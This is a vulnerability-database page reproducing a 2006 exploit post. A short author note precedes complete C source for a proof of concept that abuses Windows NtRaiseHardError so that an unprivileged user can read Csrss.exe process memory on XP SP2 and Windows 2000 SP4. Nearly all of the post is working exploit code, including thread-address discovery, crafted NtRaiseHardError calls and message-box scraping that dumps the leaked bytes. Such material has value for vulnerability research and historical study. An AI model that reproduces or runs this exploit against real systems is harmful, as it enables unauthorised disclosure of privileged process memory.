Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

csrssexe.txt

🗓️ 28 Dec 2006 00:00:00Reported by Ruben SantamartaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

NtRaiseHardError bug exploit for Csrss.exe memory disclosur

Code
`  
Hi,  
  
I have been taking a look at the NtRaiseHardError bug and just for fun  
I've coded an exploit. Watch out, not for the double free vulnerability  
(indeed I have not analyzed that piece of code yet) but just relying on  
NtRaiseHardError internals and how is dispatched a MessageBox with  
MB_SERVICE_NOTIFICATION parameter enabled...  
  
In google groups there are old references for this bug as a  
DoS.Unprivileged users can exploit that bug in order to read Csrss.exe  
process memory though.  
Not a big deal, but curious at least.  
  
Tested on XP SP2 and 2K SP4 fully patched.  
  
cheers,  
Rubén.  
  
----------------------------------------------  
Direct download  
http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=43  
  
/////////////////////////////////////////  
/////////////////////////////////////////  
///// Microsoft Windows NtRaiseHardError  
///// Csrss.exe memory disclosure  
/////////////////////////////////////////  
///// Ruben Santamarta  
///// ruben at reversemode dot com  
///// www.reversemode.com  
/////////////////////////////////////////  
///// 12.27.2006  
///// For educational purposes ONLY  
///// Compiled using gcc (Dev-C++)  
////////////////////////////////////////  
  
#include <stdio.h>  
#include <windows.h>  
#include <winbase.h>  
#include <ntsecapi.h>  
  
  
#define UNICODE  
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)  
#define STATUS_SUCCESS ((NTSTATUS) 0x00000000)  
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004)  
#define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D)  
#define SystemProcessesAndThreadsInformation 5  
#define NTAPI __stdcall  
  
int gLen=1;  
  
  
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS,  
ULONG,  
ULONG,  
PULONG,  
UINT,  
PULONG);  
  
  
typedef LONG NTSTATUS;  
typedef LONG KPRIORITY;  
  
typedef struct _CLIENT_ID {  
DWORD UniqueProcess;  
DWORD UniqueThread;  
} CLIENT_ID, * PCLIENT_ID;  
  
  
typedef struct _VM_COUNTERS {  
SIZE_T PeakVirtualSize;  
SIZE_T VirtualSize;  
ULONG PageFaultCount;  
SIZE_T PeakWorkingSetSize;  
SIZE_T WorkingSetSize;  
SIZE_T QuotaPeakPagedPoolUsage;  
SIZE_T QuotaPagedPoolUsage;  
SIZE_T QuotaPeakNonPagedPoolUsage;  
SIZE_T QuotaNonPagedPoolUsage;  
SIZE_T PagefileUsage;  
SIZE_T PeakPagefileUsage;  
} VM_COUNTERS;  
  
  
typedef struct _SYSTEM_THREAD_INFORMATION {  
LARGE_INTEGER KernelTime;  
LARGE_INTEGER UserTime;  
LARGE_INTEGER CreateTime;  
ULONG WaitTime;  
PVOID StartAddress;  
CLIENT_ID ClientId;  
KPRIORITY Priority;  
KPRIORITY BasePriority;  
ULONG ContextSwitchCount;  
LONG State;  
LONG WaitReason;  
} SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION;  
  
  
  
typedef struct _SYSTEM_PROCESS_INFORMATION {  
ULONG NextEntryDelta;  
ULONG ThreadCount;  
ULONG Reserved1[6];  
LARGE_INTEGER CreateTime;  
LARGE_INTEGER UserTime;  
LARGE_INTEGER KernelTime;  
UNICODE_STRING ProcessName;  
KPRIORITY BasePriority;  
ULONG ProcessId;  
ULONG InheritedFromProcessId;  
ULONG HandleCount;  
ULONG Reserved2[2];  
VM_COUNTERS VmCounters;  
IO_COUNTERS IoCounters;  
SYSTEM_THREAD_INFORMATION Threads[5];  
} SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION;  
  
  
  
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);  
  
  
ULONG GetCsrssThread()  
{  
ULONG cbBuffer = 0x5000;  
ULONG tPointer;  
LPVOID pBuffer = NULL;  
NTSTATUS Status;  
PCWSTR pszProcessName;  
DWORD junk;  
ULONG ThreadCount;  
int i=0,b=0;  
  
PQUERYSYSTEM NtQuerySystemInformation;  
PSYSTEM_THREAD_INFORMATION pThreads;  
PSYSTEM_PROCESS_INFORMATION pInfo ;  
  
NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress( LoadLibrary(  
"ntdll.dll" ),  
"NtQuerySystemInformation" );  
  
  
do  
{  
pBuffer = malloc(cbBuffer);  
if (pBuffer == NULL)  
{  
printf(("Not enough memory\n"));  
break;  
}  
  
Status = NtQuerySystemInformation(  
SystemProcessesAndThreadsInformation,  
pBuffer, cbBuffer, NULL);  
  
if (Status == STATUS_INFO_LENGTH_MISMATCH)  
{  
free(pBuffer);  
cbBuffer *= 2;  
}  
else if (!NT_SUCCESS(Status))  
{  
printf("NtQuerySystemInformation Error! ");  
free(pBuffer);  
}  
  
} while (Status == STATUS_INFO_LENGTH_MISMATCH);  
  
  
pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer;  
  
for (;;)  
{  
  
  
if (pInfo->NextEntryDelta == 0)  
break;  
if(pInfo->ProcessName.Buffer!=NULL &&  
!wcsicmp(pInfo->ProcessName.Buffer,L"csrss.exe"))  
{  
  
printf("\n[%ws] \n\n", pInfo->ProcessName.Buffer);  
printf("5 addresses for testing purposes\n\n");  
for(b=0;b<5;b++)  
{  
printf("Thread %d ->  
0x%x\n",b,pInfo->Threads[b].StartAddress);   
}  
tPointer=(ULONG)pInfo->Threads[1].StartAddress;  
}  
pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo)  
+ pInfo->NextEntryDelta);  
}  
  
free(pBuffer);  
return tPointer;  
}  
  
VOID WINAPI ReadBox( LPVOID param )  
{  
  
HWND hWindow,hButton,hText;  
int i=0,b=0;  
int gTemp;  
char lpTitle[300];  
char lpText[300];  
char lpBuff[500];  
  
for (;;)  
{  
  
lpText[0]=(BYTE)"";  
Sleep(800);  
hWindow = FindWindow("#32770",NULL);  
if(hWindow != NULL)  
{  
GetWindowText(hWindow,(LPSTR)&lpTitle,250);  
  
hText=FindWindowEx(hWindow,0,"static",0);  
  
GetWindowText(hText,(LPSTR)&lpText,250);  
hText=GetNextWindow(hText,GW_HWNDNEXT);  
  
GetWindowText(hText,(LPSTR)&lpText,250);  
gTemp = strlen(lpTitle);  
  
if ( gTemp>1 ) gLen = gTemp;  
else gLen = 1;  
  
for(i = 0; i < gTemp; i++) printf("%.2X",(BYTE)lpTitle[i]);  
  
  
SendMessage(hWindow,WM_CLOSE,0,0);  
  
ZeroMemory((LPVOID)lpTitle,250);  
ZeroMemory((LPVOID)lpText,250);  
ZeroMemory((LPVOID)lpBuff,300);  
}  
  
}  
}  
  
  
  
  
int main()  
{  
  
UNICODE_STRING uStr={5,5,L"fun!"};  
ULONG retValue,args[]={0,0,&uStr};  
ULONG csAddr;  
PNTRAISE NtRaiseHardError;  
int i=0;  
  
system("cls");  
printf("##########################################\n");  
printf("### Microsoft Windows NtRaiseHardError ###\n");  
printf("##### Csrss.exe memory disclosure ######\n");  
printf("@@@@@ Xmas Exploit - ho ho ho! @@@@@@\n");  
printf("## Ruben Santamarta www.reversemode.com ##\n");  
printf("##########################################\n\n");  
  
NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),  
"NtRaiseHardError");  
  
csAddr=GetCsrssThread();  
  
args[0]=csAddr;  
args[1]=csAddr;  
printf("\n[+] Capturing Messages \n");  
  
CreateThread( NULL,  
0,  
(LPTHREAD_START_ROUTINE)ReadBox,  
0,  
0,  
NULL);  
  
  
  
printf("\n[+] Now reading at: [0x%p] - Thread 1\n\n",csAddr);   
  
for(;;)  
{  
printf("Reading bytes at [0x%p] : ",args[0]);  
NtRaiseHardError(0x50000018,3,4,args,1,&retValue);  
  
if(retValue && gLen<=1) printf("00\n");  
else printf("\n");  
  
args[0]+=gLen;  
args[1]+=gLen;  
}  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4
ntraiseharderrorcsrss.exememory disclosureexploitmessageboxvulnerabilitydosprivilege escalationexploitationwindows xpwindows 2000securitybug
26